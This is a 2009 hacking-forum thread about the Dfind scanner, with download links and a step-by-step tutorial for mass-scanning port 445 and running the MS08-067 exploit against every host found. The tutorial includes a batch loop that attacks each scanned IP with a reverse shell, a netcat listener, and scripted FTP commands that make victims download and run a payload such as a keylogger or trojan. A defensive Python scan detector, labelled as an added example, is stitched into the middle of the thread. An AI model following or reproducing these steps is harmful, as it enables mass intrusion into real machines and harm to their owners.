Dark Angel forum: Hacking and Reverse
Topic: Dfind (Hacking -> Scanners)
Fwank (Member; registered 25 Nov 2009; 100 messages)
Posted: Wed 9 Dec 2009, 08:06    Subject: Dfind

It can be found at:
http://cerise.confite.free.fr/index.php?last=APPZ
Direct download:
http://cerise.confite.free.fr/APPZ/DFind.rar
and at:
http://ilosediro.free.fr/dwl.html
http://membres.lycos.fr/sheryozz/DFind.rar

Some tutorials at:
http://heapoverflow.com/f0rums/dfind/


Fwank (Member; registered 25 Nov 2009; 100 messages)
Posted: Wed 9 Dec 2009, 08:14    Subject: Dfind

A tutorial that uses dfind to find open 445 ports and launch an exploit on the machines:
( http://pastebin.com/pastebin.php?dl=f165ab4d5 )

Tutorial for exploiting computers using MS08-067(.exe).

Tools you will need to do this?

Dfind.exe (This will mass scan IP ranges for the vulnerable IP's.)

MS08-067.exe (The universal exploit version, not the chinese one.)

Netcat (To create the reverse shells.)

The above 3 things can be found at the following URLs:

Rootkit. You WILL need some kind of payload, depending on what tickles your fancy, some mod of ServU, a keylogger, trojan, whatever you want to send over using the reverse shell. IF YOU DON'T HAVE THIS ALL THE REST IS POINTLESS.

FTP: You will need an FTP server for my method. Although I'm sure there are plenty of other methods, this is the one I use, so it's the one I'll be teaching you.

Before you start, I won't be explaining everything.. I'll just be guaranteeing the fact that it will work. If I get lots of requests for me to explain each bit.. I'll eventually just stop answering. (Although I don't mind answering a few ofc.)

Part0.5:

This is all for educational purposes blah blah, and if you get arrested it wasn't my fault.. etc etc.

Part1: Scanning
Part2: Exploiting
Part3: Netcat
Part4: exploit away!
Part5: Sending/receiving payload.

----------------------------------------------------------------------------
Part1:

Okay so I'm sure you're all aware how this process starts: you need to find IP ranges from fast countries/companies/ISPs.

Easiest way to do this is start > run > cmd.exe

Then type 'nslookup google.co.uk' or whatever. It'll give you their IP range. (The IP used in the examples will be google.co.uk's, to save confusion.)

So, just for ease.. create a folder wherever, and put dfind.exe, ms08-067.exe and netcat all in that folder. For my examples I will be using "C:\ms08-067"

So.. now we're on a roll.

You open another cmd.exe and type "cd c:\ms08-067" (this will change dir to your main 'hack' directory).

In this cmd window you now type:

Code:
dfind.exe -p 445 216.239.1.1 216.239.255.255 2500


Breakdown:

dfind.exe: the program being executed.

-p sets the port you're scanning for. (445, as this is what the exploit uses.)

216.239.1.1 (start of scan)
216.239.255.255 (end of scan)

2500 is the number of threads scanning at a time. If you have a shitty connection, you may want to tone this down.

This command will now make a 'Dfind.txt' file, in the same folder as Dfind.

Now sit back and wait for the good times to roll. Or until the scan completes.. whichever comes first.

----------------------------------------------------------------------------
Part2:

So you have a fuckload of :445 scans? awesome!

Open Dfind.txt into a text editor and find+replace ':445' with nothing.
This should leave you a longggg list of just IP's?

rename Dfind.txt to scan.txt.. now proceed:

Now you get to choose, what OS do you want to hit?

# Targets: #
# 01. Windows 2000 EN #
# 02. Windows XP SP0 EN #
# 03. Windows XP SP1 EN #
# 04. Windows XP SP2 EN [DEP BREAK] #
# 05. Windows XP SP2 RU [DEP BREAK] #
# 06. Windows XP SP2 FR [DEP BREAK] #
# 07. Windows XP SP2 IT [DEP BREAK] #
# 08. Windows XP SP2 BR [DEP BREAK] #
# 09. Windows XP SP2 DE [DEP BREAK] #
# 10. Windows XP SP2 CN [DEP BREAK] #
# 11. Windows XP SP3 EN [DEP BREAK] #
# 12. Windows XP SP3 FR [DEP BREAK] #
# 13. Windows XP SP3 ES [DEP BREAK] #
# 14. Windows XP SP3 DE [DEP BREAK] #
# 15. Windows XP SP3 BR [DEP BREAK] #
# 16. Windows 2003 SP0 EN #
# 17. Windows 2003 SP1 EN #
# 18. Windows 2003 SP2 EN #
# 19. Windows 2003 SP1 EN [DEP BREAK] #
# 20. Windows 2003 SP2 EN [DEP BREAK] #
# 21. DOS/Crash/Debug/Test/Fun #


Now obviously, if you just wanna hack'n'slash at as many PCs as possible, 01 is the best option. So for quickest results, all my examples will use 01. But if you decide on going for the rarer servers, just use 18.

Now you're wondering wtf I'm going on about? Well, I haven't explained it yet!

Open notepad and type in:

Code:
FOR /F "tokens=1* delims=, " %%i in (scan.txt) do ms08-067.exe -h %%i -t 01 -R <Your IP>:<Any Port>


So say i'm google and doing this, mine would look like:

Code:
FOR /F "tokens=1* delims=, " %%i in (scan.txt) do ms08-067.exe -h %%i -t 01 -R 66.249.93.104:7456


Now save this file as run.BAT .
This batch file will grab each IP individually out of scan.txt and try to exploit each IP for 01 (win 2000).

----------------------------------------------------------------------------
Part3:
Netcat-

Open up notepad again and type in:

Code:
nc -L -p 7456 -vv


Now save this file again, but as nc.bat.

This batch file, when run, will listen on port 7456 and create the reverse shell if the exploit finds any vulnerable computers.

----------------------------------------------------------------------------
Part4:

Run NC.bat about 10 times. This will open up a window listening on your specified port.

Run run.bat. This will start attempting to exploit all your IP's from scan.txt.

..what, that's it!

When you're successful, one of the listening windows will show as "c:\WINNT\system32" or something, waiting for you to type in what you want to do.

----------------------------------------------------------------------------
Part5:

Using that FTP of yours!

When you get a command window open for a vulnerable pc, type in this code.. line for line:
(without [ and ]'s)


Code:
echo open [Your.FTP.IP] [PORT.for.FTP] >> ftp1.scr
echo user [LOGIN.to.FTP] >> ftp1.scr
echo [FTP.Password] >> ftp1.scr
echo get [PAYLOAD.EXE] >> ftp1.scr
echo QUIT >> ftp1.scr
ftp -i -n -v -s:ftp1.scr


If you don't understand, god help you. But when you type in that, your vulnerable PC will try to connect to your ftp and retrieve your payload, whatever that may be.

When your victim has retrieved your payload, simply execute it by typing:

'payload.exe'.

----------------------------------------------------------------------------
Part6:

Being patient. Each PC might not retrieve your payload, some might not even execute properly. So just keep trying. Now it's your time to get creative!







This will be the first tutorial of many from TheJeco, we hope you enjoy.. and if you don't, we hope you die. And if you don't think I explained something properly.. please gimme a msg and we'll update it.
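The scanning step in Part1 (one source hitting one port across an entire range with thousands of parallel threads) is noisy from the network's side, so the defender's counterpart to that part is a scan detector. The script below is an added example and is not part of the forum post or the tutorial; the log format (`<ISO timestamp> <src_ip> <dst_ip> <dst_port> <ALLOW|DENY>`), the addresses (documentation ranges), the 60-second window and the 20-destination threshold are all constructed assumptions, and `generate_scan_lines` is a helper that fabricates sample lines for the demonstration. It also generalises beyond port 445: the watched port and the threshold are parameters.

```python
"""Detect Dfind-style mass scanning (one source, one port, many hosts) in
firewall connection logs.

Added example, not code from the forum post. Log format is a constructed,
simplified one:  "<ISO timestamp> <src_ip> <dst_ip> <dst_port> <ALLOW|DENY>".
Both ALLOW and DENY records count: a scanner sweeping a range also hits hosts
that do not exist, and those denied attempts are the clearest signal.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed sliding window for the detector
THRESHOLD = 20                   # assumed distinct destinations per window
WATCHED_PORT = 445               # the port the tutorial scans for


def generate_scan_lines(src, count):
    """Constructed helper: emulate one scanner sweeping `count` consecutive
    hosts of 203.0.113.0/24 on port 445, 40 ms apart (hypothetical data)."""
    base = datetime(2009, 12, 9, 8, 6, 0)
    lines = []
    for i in range(count):
        ts = (base + timedelta(milliseconds=40 * i)).strftime("%Y-%m-%dT%H:%M:%S")
        lines.append(f"{ts} {src} 203.0.113.{i % 254 + 1} 445 DENY")
    return lines


# Constructed sample log: one scanner plus benign SMB and web traffic.
SAMPLE_LOG = "\n".join(
    generate_scan_lines("198.51.100.7", 120)
    + [
        "2009-12-09T08:06:05 192.0.2.10 192.0.2.50 445 ALLOW",   # file-server client
        "2009-12-09T08:06:09 192.0.2.10 192.0.2.50 445 ALLOW",
        "2009-12-09T08:06:12 192.0.2.10 192.0.2.51 445 ALLOW",
        "2009-12-09T08:06:15 192.0.2.11 203.0.113.200 80 ALLOW",  # web browsing
        "2009-12-09T08:06:16 192.0.2.11 203.0.113.201 443 ALLOW",
    ]
)


def parse_line(line):
    """Split one log record into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def find_scanners(log_text, port=WATCHED_PORT, threshold=THRESHOLD, window=WINDOW):
    """Return {src_ip: peak distinct destinations on `port` within `window`}
    for every source whose peak reaches `threshold`.

    A legitimate client talks to a handful of servers on 445; a range scanner
    touches hundreds of distinct hosts in seconds, so the number of distinct
    destinations per window separates the two far better than raw hit counts.
    """
    events = defaultdict(list)  # src -> [(timestamp, dst)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _action = parse_line(line)
        if dport == port:
            events[src].append((ts, dst))

    alerts = {}
    for src, hits in events.items():
        hits.sort()                     # chronological order for the sliding window
        in_window = defaultdict(int)    # dst -> hits currently inside the window
        start = 0
        peak = 0
        for ts, dst in hits:
            in_window[dst] += 1
            # Slide the window start forward past records older than `window`.
            while ts - hits[start][0] > window:
                old_dst = hits[start][1]
                in_window[old_dst] -= 1
                if in_window[old_dst] == 0:
                    del in_window[old_dst]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for src, peak in find_scanners(SAMPLE_LOG).items():
        print(f"ALERT scan source {src}: {peak} distinct hosts on tcp/{WATCHED_PORT} within {WINDOW}")
```

On the sample data only 198.51.100.7 is reported; the file-server client on 192.0.2.10 reaches two destinations and stays below the threshold. Against real logs, feed `find_scanners` the records of a perimeter or host firewall and tune `WINDOW` and `THRESHOLD` to the site's normal SMB fan-out.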


4l3x (Administrator; registered 04 Nov 2009; 96 messages)
Posted: Wed 9 Dec 2009, 11:40    Subject: Dfind

Scan1000

http://www.xup.in/dl,11661587/scan1000.exe/
and
http://www.pdx-gaming.de/praktikum/tools/scan1000.exe
http://www.pdx-gaming.de/praktikum/tools/scan500.exe


anmol77 (registered 13 May 2016; 1 message; location: PAKISTAN)
Posted: Fri 13 May 2016, 12:09    Subject: Dfind

thanks for everything

